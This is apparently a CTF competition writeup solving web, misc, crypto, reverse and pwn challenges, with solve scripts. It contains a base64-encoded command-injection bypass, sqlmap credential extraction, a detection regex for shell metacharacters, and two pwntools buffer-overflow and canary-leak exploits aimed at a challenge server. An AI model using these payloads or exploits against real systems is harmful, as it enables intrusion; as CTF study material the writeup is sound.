WEB

Simple injection

Opening the challenge, there is no obvious injection point.

A dirb scan turns up a robots.txt file.

Visiting it gives a hint.

Visiting each path in turn: one is a login page, the other an injection page.

Running sqlmap against it directly yields the account admin456 with password dasctfyyds123.

Log in to the earlier login page with the recovered credentials, wait three seconds, and the flag appears.

ping

Chaining a second command with a pipe and listing the root directory reveals a flag file.

Running cat flag directly does not work.

Capturing the request shows that flag, * and ? are filtered out.

Wildcards do not get through, so the filter is bypassed with base64 encoding; payload: echo Y2F0IC9mbGFn|base64 -d|bash
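The filter above blocks a few substrings instead of validating the parameter, which is why an encoded payload slips past it. As an added illustration that is not part of the original writeup (the challenge's own filter code is not shown, so the blacklist below is a reconstruction), this Python puts the weak blacklist next to an allow-list validator that builds a shell-free argv for ping, plus a log-detection heuristic for this class of input:

```python
import ipaddress
import re

# Reconstruction (assumption) of the challenge's substring blacklist: the writeup
# only tells us that flag, * and ? are filtered.
BLOCKED = ("flag", "*", "?")

def blacklist_allows(user_input):
    """Substring blacklist: True means the input would reach the shell unchanged."""
    return not any(token in user_input for token in BLOCKED)

def safe_ping_argv(user_input):
    """Allow-list alternative: accept only a syntactically valid IP address and
    return an argv list for subprocess.run(argv) with no shell involved, so
    metacharacters such as | ; and $ are never interpreted. None for anything else."""
    try:
        target = ipaddress.ip_address(user_input.strip())
    except ValueError:
        return None
    return ["ping", "-c", "1", str(target)]

# Detection heuristic for access/audit logs: shell metacharacters or a
# decode-and-execute stage inside a parameter that should hold only an address.
INJECTION_RE = re.compile(r"[|;&`$]|base64\s+-d|\b(?:ba)?sh\b")

def looks_like_injection(user_input):
    return INJECTION_RE.search(user_input) is not None

if __name__ == "__main__":
    # the writeup's bypass payload, chained onto a ping target
    sample = "127.0.0.1|echo Y2F0IC9mbGFn|base64 -d|bash"
    print("blacklist allows:", blacklist_allows(sample))   # True
    print("safe argv:", safe_ping_argv(sample))            # None
    print("flagged:", looks_like_injection(sample))        # True
```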

hasai

PHP strict-type comparison; it is bypassed directly with the right input.

MISC

FTPPPP

The challenge hints to focus on the password; searching for it directly in Wireshark is enough.

eight_birds

The challenge mentions eight birds but the attached image shows only five, so the image height probably needs to be changed.

After changing the height in 010 Editor, characters become visible; scrolling further down, an archive file is found at the bottom of the file.

Change the image extension to zip and extract it with the string shown in the image; this gives flag.txt.
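The height edit and the appended archive can both be handled programmatically. The following Python is an added example, not part of the original writeup: it walks the PNG chunk list, reports the IHDR dimensions and any bytes trailing IEND (where an appended zip sits), and rewrites the height with a recomputed chunk CRC so viewers do not reject the edited header. The sample PNG is constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def chunk(ctype, body):
    """Serialise one PNG chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def inspect_png(data):
    """Return IHDR width/height, whether the IHDR CRC is valid, and bytes after IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, info = len(PNG_SIG), {}
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if ctype == b"IHDR":
            info["width"], info["height"] = struct.unpack(">II", body[:8])
            info["ihdr_crc_ok"] = crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)
        pos += 12 + length
        if ctype == b"IEND":
            break
    info["trailing"] = data[pos:]   # anything here is not part of the image
    return info

def set_height(data, new_height):
    """Rewrite the IHDR height (body bytes 4..8) and recompute the chunk CRC."""
    start = len(PNG_SIG)            # IHDR is always the first chunk
    length = struct.unpack(">I", data[start:start + 4])[0]
    body = bytearray(data[start + 8:start + 8 + length])
    body[4:8] = struct.pack(">I", new_height)
    return data[:start] + chunk(b"IHDR", bytes(body)) + data[start + 12 + length:]

# Constructed sample: a 5x5 header-only PNG with a zip local-file header appended after IEND.
IHDR_BODY = struct.pack(">IIBBBBB", 5, 5, 8, 2, 0, 0, 0)
SAMPLE = PNG_SIG + chunk(b"IHDR", IHDR_BODY) + chunk(b"IEND", b"") + b"PK\x03\x04constructed-zip"

if __name__ == "__main__":
    print(inspect_png(SAMPLE))
    print(inspect_png(set_height(SAMPLE, 8)))
```

A real image would also need the IDAT payload to contain enough rows for the new height; the CRC fix only keeps the header acceptable to strict decoders.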

From the hints in the archive password, affine together with a19 and b21, this is an affine cipher; decrypting it gives the flag.

stealer

Open the capture and filter on DNS: there is a lot of repeated data, so filter by IP as well.

Extract the contents; they turn out to be the base64 encoding of an image. Remove the useless characters Standard query 0x6a7a Actf.com.cn OPT-

Then replace * with + and convert the result back into an image.
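The extraction steps above (strip the Wireshark info-column boilerplate, drop the repeated queries, swap * back to +, base64-decode) as an added Python example that is not part of the original writeup. The log lines are constructed to imitate the page's pattern; the exact position of the data inside the query name is an assumption.

```python
import base64
import re

# Constructed sample of Wireshark "Info" lines for the exfiltration queries: the base64
# chunk sits between the record type and ctf.com.cn, '+' was swapped for '*' so it
# survives as a DNS label, and every query was captured twice (retransmission).
SECRET = b"\x89PNG\r\n\x1a\n" + b"\x00\xfb\xef\xbe" + b"payload"   # stands in for the image
B64 = base64.b64encode(SECRET).decode().replace("+", "*")
LOG_LINES = []
for part in (B64[i:i + 8] for i in range(0, len(B64), 8)):
    line = f"Standard query 0x6a7a A {part}ctf.com.cn OPT"
    LOG_LINES += [line, line]

QUERY_RE = re.compile(r"Standard query 0x[0-9a-f]{4} A (\S+?)ctf\.com\.cn OPT")

def reassemble(lines):
    """Keep the first copy of each query, pull out the chunk, undo the '*'
    substitution and base64-decode the joined chunks."""
    chunks, seen = [], set()
    for line in lines:
        m = QUERY_RE.search(line)
        if not m or line in seen:
            continue
        seen.add(line)
        chunks.append(m.group(1))
    joined = "".join(chunks).replace("*", "+")
    joined += "=" * (-len(joined) % 4)     # restore padding if the tail was cut
    return base64.b64decode(joined)

def is_png(data):
    """Sanity check on the reassembled bytes before writing them to disk."""
    return data.startswith(b"\x89PNG\r\n\x1a\n")

if __name__ == "__main__":
    data = reassemble(LOG_LINES)
    print(len(LOG_LINES), "lines ->", len(data), "bytes, PNG:", is_png(data))
```

Deduplicating on the whole line merges two genuinely identical consecutive chunks as well; if the capture keeps transaction IDs or timestamps distinct per query, key on those instead.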

CRYPTO

affext

# Challenge source: the alphabet is shuffled, then each flag character is mapped through
# an affine function of its reversed position in the shuffled table.
from Crypto.Util.number import *
import random


tables = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}'
flag = 'DASCTF{%s}'%("".join(random.sample(tables[:-2], 32)))

tables = "".join(random.sample(tables, len(tables)))
print('tables =', tables)

a = getPrime(6)   # a 6-bit prime, i.e. one of 37, 41, 43, 47, 53, 59, 61
b = getPrime(6)
c = ''
for i in range(len(flag)):
    # c_i = tables[(a * (63 - index(flag_i)) + b) mod 64]
    c += tables[(a * (len(tables) - 1 - tables.find(flag[i])) + b) % len(tables)]
print('c =', c)

'''
tables = zuSYnb}O1{VoARpPDMgmKwiWZUxde9qNQkL30sTtJvjBH658Er4yhCXafc7G2IlF
c = h17d}vaMUGgNy}ioSD9B8Fvm12qOsXbc6LPzAKQT
'''

Work out the values of a and b, then substitute them back and invert the mapping on c.

from Crypto.Util.number import inverse

tables = 'zuSYnb}O1{VoARpPDMgmKwiWZUxde9qNQkL30sTtJvjBH658Er4yhCXafc7G2IlF'
c = 'h17d}vaMUGgNy}ioSD9B8Fvm12qOsXbc6LPzAKQT'
n = len(tables)   # 64
# candidates for the 6-bit primes returned by getPrime(6); 67 is 7-bit and never matches
primes = [37, 41, 43, 47, 53, 59, 61, 67]
flag = ''
for a in primes:
    for b in primes:
        # The plaintext starts with 'DASCTF{', so the first two characters pin down a and b:
        # 'D' is tables[16] and encrypts to 'h' = tables[52]; 'A' is tables[12] and encrypts to '1' = tables[8].
        if 52 == (a * (n - 1 - 16) + b) % n and 8 == (a * (n - 1 - 12) + b) % n:
            # invert c_i = tables[(a * (n-1-idx) + b) mod n]:  idx = n-1 - (idx_c - b) * a^-1 mod n
            for i in range(len(c)):
                flag += tables[(n - 1 - (tables.find(c[i]) - b) % n * inverse(a, n)) % n]
print(flag)

rsa9

# Challenge source (Python 2: str.encode("hex") and the tuple-style print output below)
from Crypto.Util.number import *
import binascii
import gmpy2

flag = '*********************'
hex_flag=int(flag.encode("hex"),16)

p=getPrime(512)
q=getPrime(512)

n=p*q
e=0x3
c=pow(hex_flag,e,n)

print("n=",hex(n))
print("e=",hex(e))
print("c=",hex(c))

'''
('n=', '0x86f4be77b79e166a6311e7982ba2e5ff479db93a01c56034479a9e35382293c35769da222974e9425829099aa4fe4f41185283866202042b356194bab312e6ed2fb0b10b1b74767dc1cc5306872d33b1f3b75612c594751ec70e4cf5fccc6fceafe0401648869cc40425a176ab70286d92a29dfd675f2384c9383e0a9750b25bL')
('e=', '0x3')
('c=', '0x10652cdf7ed2bc53f58b321f476c3a3cf3281e541f4d533a73a0fcbf525230f2e01c183dee660676317ea99250202548e5525b0c14adbeb77d4fa7e2e1d339L')
'''

n, e and c are known, with n=p*q. Normally one would factor n into p and q and compute from there, but n is too large for yafu to factor. Here e is very small, 3, so this is probably a small-plaintext (low-exponent) attack.

First convert n, e and c to decimal.

n=94769348041557949631066992681248374245419599063572386903701806390529231509719354984024221562917404135160853809938505961371941524101274299389094565807401359089942764397812436886303691664293894074265241895767317138963199946016477485556305687692983444678324548099386990670635764441695771144643477049963023741531
e=3
c=3354246620726085986568668128373090812593945499332956611216503173394622300212425527028396698978553852269462669721310427515531023131901147683787903193913

Then write the solve script:

import gmpy2
from Crypto.Util.number import long_to_bytes

def small_msg(e, n, c):
    # With e = 3 and a short message, m^e is smaller than n (or exceeds it by only a
    # few multiples), so m is the exact e-th root of k*n + c for some small k.
    for k in range(200000000):
        root, exact = gmpy2.iroot(k * n + c, e)
        if exact:
            return root
    return False


e = 3
n = 94769348041557949631066992681248374245419599063572386903701806390529231509719354984024221562917404135160853809938505961371941524101274299389094565807401359089942764397812436886303691664293894074265241895767317138963199946016477485556305687692983444678324548099386990670635764441695771144643477049963023741531
cipher = 3354246620726085986568668128373090812593945499332956611216503173394622300212425527028396698978553852269462669721310427515531023131901147683787903193913
msg = small_msg(e, n, cipher)
print(long_to_bytes(msg))

The MD5 of the recovered value is the flag.

REVERSE

intertwine

Opening it in PEiD shows a 32-bit binary.

Analyse it with 32-bit IDA, find the main function and press F5 to view the pseudocode.

Reading the code shows that it is just a simple nested loop.

Each value of v9 is multiplied by 16 and str is added; if the result equals the corresponding value of v8, the flag is correct. The pseudocode gives the values of v9 and v8 as well as the program logic, so a script that works backwards recovers str directly.

v9 = [133, 113, 68, 124, 67, 27, 148, 63, 121, 165, 61, 54, 83, 66, 96, 87, 104, 97, 49, 54, 115, 27, 97, 17, 113, 126,
      51, 25, 61, 115, 32, 1]
v8 = [
    44512, 44288, 44288, 44000, 44320, 44000, 44288, 43008, 44736, 44192, 44000, 44448, 44064, 44480, 44832, 44000,
    44224, 44064, 44480, 44672, 44064, 42656, 44672, 44320, 44128, 44000, 44480, 44704, 44448, 43072, 44192, 44608]

# The inner loop of the pseudocode adds 16 * v9[j] over all 32 entries, so the
# sum is the same for every i; the check is v8[i] == total + 32 * str[i].
total = sum(16 * v for v in v9)
for i in range(32):
    print(chr((v8[i] - total) // 32), end='')
print()

ez_apk

Open the apk in jadx-gui; the resource file res/values/strings.xml contains a cipherkey.

Right-click and jump to com.example.re2.MainActivity.

Analysis reveals an XOR step followed by a Vigenère cipher.

XOR the cipher, then Vigenère-decrypt the result with the key.

This gives flag{ez_crypto_algorithm_reverse_haha}.

easyre

Open it in 32-bit IDA and press Shift+F12; the flag is visible directly in the strings window.

PWN

easy_pwn

Open the file in IDA Pro (32-bit) and view the pseudocode of the main function.

main() calls the key function message(); next, view the pseudocode of message().

There is an unbounded stack overflow. Overwriting char s[28] and rbp and then appending shellcode_addr is enough to get a shell; the program contains a flag() backdoor function at address 0x08048519.

exp:

from pwn import *

r = remote('101.42.165.118', 20001)
shellcode_addr = 0x08048519   # address of the flag() backdoor function
# 28 bytes of s plus the 4-byte saved frame pointer, then the return address
payload = b'X' * 32 + p32(shellcode_addr)
r.sendline(payload)
r.interactive()

ez_canary

Open the file in IDA Pro (64-bit) and view the pseudocode of the main function.

main() calls the key function vuln(); next, view the pseudocode of vuln().

The canary has to be leaked first, then the payload built. There is a char v4[10]: filling v4 with 11 bytes through the read() call is enough to leak the canary. Then, through the next read(), send payload = padding + canary + padding + shell_addr to get a shell.

exp:

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
io = remote('101.42.165.118', 20002)

# 11 bytes fill v4 and overwrite the canary's low null byte, so the following
# output prints the remaining 7 canary bytes right after our 'a's.
payload = b'a' * 11
io.send(payload)
io.recvuntil(b'a' * 11)
canary = u64(b'\x00' + io.recv(7))   # put the null low byte back
log.success('Canary:\t' + hex(canary))

# padding + canary + saved rbp + return address (offsets as used in the original exploit)
payload2 = b'a' * 20 + p64(canary) + b'a' * 8 + p64(0x000000000040121E)
io.send(payload2)

io.interactive()

#DASCTF{9c565f3584a8e7ad64a73996b615811b}